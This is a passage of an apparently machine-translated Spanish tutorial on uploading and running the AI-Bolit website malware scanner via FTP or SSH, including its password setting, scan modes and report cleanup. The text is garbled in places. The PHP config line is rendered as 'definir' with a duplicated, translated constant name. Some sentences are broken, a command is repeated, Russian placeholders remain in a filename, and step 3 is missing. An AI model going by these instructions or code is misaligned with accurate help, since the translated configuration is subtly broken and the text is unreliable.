2. El siguiente paso es desempacar y subir al hosting. Para trabajar con FTP, utilizo el programa gratuito FileZilla (un excelente cliente FTP). Después de descomprimir ai-bolit.zip, encontrará la documentación de instalación en el archivo readme.txt. Si lo deseas, puedes familiarizarte con él.

definir ("PASS", "??????????????????????");

definir("PASAR", "??????????????????????");

¿Y entrar en lugar de símbolos? su significado. Guarde el archivo.

4. Luego copie todo el contenido de la carpeta /ai-bolit/ a su hosting en el directorio raíz (por ejemplo, para WP aquí es donde se encuentra wp-config).

5. Después de cargar el script en el servidor, debe iniciar AI Bolit usando el enlace en la barra de direcciones de su navegador:

https://dirección_de_su_sitio/ai-bolit.php?p=su_contraseña

Después de un tiempo, recibirá un informe de análisis de virus en su alojamiento.

En este ejemplo, parece que la verificación detectó una redirección sospechosa para dispositivos móviles ubicados en haccess, pero la agregué yo mismo. También se encontraron códigos de terceros en algunos archivos de plantilla (no están en la captura de pantalla porque ya limpié todo).

6. Una vez que el escáner AI Bolit haya completado su trabajo, definitivamente debe eliminar todos sus archivos del FTP (que descargó en el paso 4) junto con el informe.

Finalmente, me gustaría señalar que el guión contiene 2 modos de verificación: express y “paranoico”. En el primer caso, solo se verifican los archivos js, php, html y htaccess, y el segundo le permite ejecutar AI Bolit en todo su potencial. Para hacer esto, en el archivo de configuración ai-bolit.php, establezca el valor de la variable 'scan_all_files' => 1 o use un enlace con un parámetro adicional para ejecutar el script:

https://dirección_de_su_sitio/ai-bolit.php?p=su_contraseña&full

La documentación dice que antes de reiniciar es necesario eliminar AI-BOLIT-DOUBLECHECK.php, aunque yo personalmente no tenía dicho archivo en FTP. En readme.txt también encontrará información sobre cómo comprobar si un sitio web alojado tiene virus a través de SSH. El algoritmo de acciones es similar, pero después de copiar todos los archivos de script a FTP, ejecútelo con el comando:

php ai-bolit.php

php ai-bolit.php

Como resultado, se creará automáticamente un archivo. AI-BOLIT-INFORME-<дата>-<время>.html con los resultados de las pruebas. En principio, no hay nada complicado, pero puede consultar las preguntas frecuentes para obtener respuestas adicionales a sus preguntas.

En general, pude revisar el sitio en busca de virus con AI Bolit con bastante facilidad: encontré el problema y lo solucioné en aproximadamente 10 minutos. Descargue el escáner de forma gratuita desde aquí, luego debe configurar e iniciar AI Bolit usando un especial. enlace en el navegador y luego ver los resultados. Cómo reparar virus, puertas traseras y shells es una cuestión ligeramente diferente. En el caso más simple (como el mío con una redirección), simplemente eliminas el código malicioso de los archivos. Si no entiende esto bien o la tarea es demasiado complicada, puede solicitar una consulta/servicio pago a los desarrolladores del script. Le ayudarán no sólo a eliminar virus en su alojamiento, sino que también mejorarán su protección.